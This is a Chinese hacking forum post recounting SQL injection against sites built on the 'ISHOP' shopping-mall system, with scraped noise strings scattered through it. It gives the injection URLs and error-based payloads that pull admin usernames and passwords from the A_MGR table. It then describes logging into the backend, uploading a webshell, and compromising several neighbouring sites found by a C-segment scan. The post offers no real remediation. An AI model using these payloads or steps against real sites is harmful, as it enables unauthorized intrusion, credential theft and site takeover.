ISHOP商场建站系统注入漏洞

admin

发现一个注入点
: ~: h9 M* ?# u% h" Zhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
$ b( V. d$ Q7 B1 Q  k9 e/ b
习惯性的加’having1=1--

' o  p' k' R; G5 r. V! k" Rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
' J: Z2 K- q6 H
2 h! h) G, t) V  T3 l0
0 o: ]: V; ]; {2 W2 K
6 Q5 y. |1 q+ d) p0 j# p爆出Diary_A.dl_Title（这时候很激动啊）

  [0 t+ x3 Q: g3 f1 I5 H! m那么继续
1 @& x+ V  @$ b( ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—

- V7 j( t, t6 t% O/ A继续，一直爆下去
) _! I! p3 Q3 w% O
爆到几个字段和表段 但是没找到需要的管理用户的字段
2 q- g! X; E# Y; B) A* @
蛋疼了 怎么办 然后去后台登陆页看源码

0

Input name= “ADUID”
2 `* i: L- g0 I$ d; SInput name= “ADPWD”

很幸运 找到了字段那就继续
找到之后开始爆用户
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
爆密码
. S7 C$ @+ ]$ I" I( ahttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
测试了下 这个注入点只能爆到文章哪里的表
- y% U* `" J$ y1 e
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
, i7 c+ R' W) Q7 R9 w
+ S( a$ {- h6 y5 w7 s4 f又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
- R+ A  w1 o* J' R$ p7 g
473

; C- E; Y- i+ Q& v& q0 {% |进后台
( L  O$ R& g% j1 Z

发现几个上传点 有的地方不能上传 而且防止恶意代码

没办法 各种百度各种找大牛 找到一只好像可以突破的马
4 D/ b8 A0 p; R" R" K8 g
8 D3 z5 |+ H& U
在系统管理那里直接上传 不过没有显示地址
; L8 N- |" w. ~/ [# b# v$ \$ L  P
再上传一次 抓包 搞定OK

' L+ A# z8 O: X$ {
1 k9 c3 G  d8 X* ?: H
( T. o' n& [+ Y3 K& _" T472
" b; i* n. Q6 ^. H8 l
. b# ^5 v+ n% K  p# F. V晚上不行了 去睡觉。。。
) ?& V* ?5 x2 `7 W$ X( n2 G第二天刚起床 闲的没事做继续日站吧
, i/ Q9 W- x" I: L& S
找个站 就把这个站的旁c扫了下

/ S& X7 [- h2 V( P; u+ j发现c段也有一个购物站 ，然后还和这个站的模板差不多

就找到会员登录口测试
( Q: W5 i! m& W
'and (select top 1 MGR_UID from A_MGR)>0—
7 l% t4 Z9 K3 Z9 X果断爆到了 这时候我很激动 通杀
* u0 I% j0 d0 U1 x& I
再次翻c段
# v+ o% ?6 Z" J" A6 T
翻出几个站 都成功拿下



修复方案：
他们比我专业
​
+ x! r9 X0 E8 m. B8 i